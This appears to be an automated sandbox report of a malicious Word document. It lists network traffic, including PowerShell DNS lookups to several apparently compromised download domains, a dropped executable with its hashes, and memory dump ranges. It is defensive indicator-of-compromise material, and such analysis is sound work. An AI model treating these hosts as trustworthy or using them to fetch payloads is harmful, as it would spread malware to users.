    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

    HTTP Request

    GET https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200

    HTTP Response

    200
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 204.79.197.200:443
    tse1.mm.bing.net
    tls, http2
    1.2kB
    8.1kB
    16
    14
  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    WINWORD.EXE
    73 B
    244 B
    1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.28.47

  • 8.8.8.8:53
    104.219.191.52.in-addr.arpa
    dns
    73 B
    147 B
    1
    1

    DNS Request

    104.219.191.52.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    47.28.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    47.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    46.28.109.52.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    46.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    14.160.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.160.190.20.in-addr.arpa

  • 8.8.8.8:53
    givingthanksdaily.com
    dns
    powershell.exe
    67 B
    83 B
    1
    1

    DNS Request

    givingthanksdaily.com

    DNS Response

    66.96.134.60

  • 8.8.8.8:53
    tskgear.com
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    tskgear.com

    DNS Response

    103.197.57.20

  • 8.8.8.8:53
    6.173.189.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    6.173.189.20.in-addr.arpa

  • 8.8.8.8:53
    241.150.49.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    241.150.49.20.in-addr.arpa

  • 8.8.8.8:53
    60.134.96.66.in-addr.arpa
    dns
    71 B
    115 B
    1
    1

    DNS Request

    60.134.96.66.in-addr.arpa

  • 8.8.8.8:53
    20.57.197.103.in-addr.arpa
    dns
    72 B
    106 B
    1
    1

    DNS Request

    20.57.197.103.in-addr.arpa

  • 8.8.8.8:53
    26.35.223.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    26.35.223.20.in-addr.arpa

  • 8.8.8.8:53
    184.83.221.88.in-addr.arpa
    dns
    72 B
    137 B
    1
    1

    DNS Request

    184.83.221.88.in-addr.arpa

  • 8.8.8.8:53
    226.21.18.104.in-addr.arpa
    dns
    72 B
    134 B
    1
    1

    DNS Request

    226.21.18.104.in-addr.arpa

  • 8.8.8.8:53
    duolife-partner.com
    dns
    powershell.exe
    65 B
    138 B
    1
    1

    DNS Request

    duolife-partner.com

  • 8.8.8.8:53
    ponturibaschetcristianionut.com
    dns
    powershell.exe
    77 B
    150 B
    1
    1

    DNS Request

    ponturibaschetcristianionut.com

  • 8.8.8.8:53
    mrveggy.com
    dns
    powershell.exe
    57 B
    73 B
    1
    1

    DNS Request

    mrveggy.com

    DNS Response

    177.12.170.95

  • 8.8.8.8:53
    ifarmer.com.br
    dns
    powershell.exe
    60 B
    60 B
    1
    1

    DNS Request

    ifarmer.com.br

  • 8.8.8.8:53
    uniteddatabase.net
    dns
    powershell.exe
    64 B
    80 B
    1
    1

    DNS Request

    uniteddatabase.net

    DNS Response

    173.254.237.178

  • 8.8.8.8:53
    95.170.12.177.in-addr.arpa
    dns
    72 B
    114 B
    1
    1

    DNS Request

    95.170.12.177.in-addr.arpa

  • 8.8.8.8:53
    178.237.254.173.in-addr.arpa
    dns
    74 B
    113 B
    1
    1

    DNS Request

    178.237.254.173.in-addr.arpa

  • 8.8.8.8:53
    metadata.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    231 B
    1
    1

    DNS Request

    metadata.templates.cdn.office.net

    DNS Response

    23.62.61.162
    23.62.61.184

  • 8.8.8.8:53
    binaries.templates.cdn.office.net
    dns
    WINWORD.EXE
    79 B
    202 B
    1
    1

    DNS Request

    binaries.templates.cdn.office.net

    DNS Response

    2.17.251.23
    2.17.251.17

  • 8.8.8.8:53
    162.61.62.23.in-addr.arpa
    dns
    71 B
    135 B
    1
    1

    DNS Request

    162.61.62.23.in-addr.arpa

  • 8.8.8.8:53
    23.251.17.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    23.251.17.2.in-addr.arpa

  • 8.8.8.8:53
    183.59.114.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    183.59.114.20.in-addr.arpa

  • 8.8.8.8:53
    206.23.85.13.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    206.23.85.13.in-addr.arpa

  • 8.8.8.8:53
    22.236.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    22.236.111.52.in-addr.arpa

  • 8.8.8.8:53
    tse1.mm.bing.net
    dns
    62 B
    173 B
    1
    1

    DNS Request

    tse1.mm.bing.net

    DNS Response

    204.79.197.200
    13.107.21.200

  • 8.8.8.8:53
    205.47.74.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    205.47.74.20.in-addr.arpa

  • 8.8.8.8:53
    106.246.116.51.in-addr.arpa
    dns
    73 B
    159 B
    1
    1

    DNS Request

    106.246.116.51.in-addr.arpa

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vukzly54.wb1.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl

    Filesize

    245KB

    MD5

    f883b260a8d67082ea895c14bf56dd56

    SHA1

    7954565c1f243d46ad3b1e2f1baf3281451fc14b

    SHA256

    ef4835db41a485b56c2ef0ff7094bc2350460573a686182bc45fd6613480e353

    SHA512

    d95924a499f32d9b4d9a7d298502181f9e9048c21dbe0496fa3c3279b263d6f7d594b859111a99b1a53bd248ee69b867d7b1768c42e1e40934e0b990f0ce051e

  • C:\Users\Admin\m4Obyxb\O2ee0Qk\W_c1yyz.exe

    Filesize

    60KB

    MD5

    6b8469cda5a5dd989f9b1b5d0748e0cb

    SHA1

    5d0e53f5ba85ef5288a1883e75528e3df3a3da60

    SHA256

    b3e2d2bb65ee223bda473aab760bafaacf3e6fab52f0c290690e5ff5632fd1d2

    SHA512

    bba57cc6d1ecb240404f75f97549de22aac482894f3d1ca203aaf2236d05af01f8c51c7d11a86d8f8b5251ce8a28c9d7ba47912c91e4f6b0d14b1644c836634a

  • memory/1692-10-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-62-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-7-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-9-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-8-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-5-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-3-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-0-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-13-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-14-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/1692-16-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-15-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-12-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-11-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-17-0x00007FFA27CD0000-0x00007FFA27CE0000-memory.dmp

    Filesize

    64KB

  • memory/1692-29-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-33-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-60-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-6-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-61-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-4-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-617-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-2-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-108-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-109-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

    Filesize

    4KB

  • memory/1692-110-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-111-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-1-0x00007FFA6A44D000-0x00007FFA6A44E000-memory.dmp

    Filesize

    4KB

  • memory/1692-589-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-590-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-591-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-592-0x00007FFA6A3B0000-0x00007FFA6A5A5000-memory.dmp

    Filesize

    2.0MB

  • memory/1692-614-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-615-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-613-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/1692-616-0x00007FFA2A430000-0x00007FFA2A440000-memory.dmp

    Filesize

    64KB

  • memory/2384-82-0x000001B9298E0000-0x000001B929902000-memory.dmp

    Filesize

    136KB
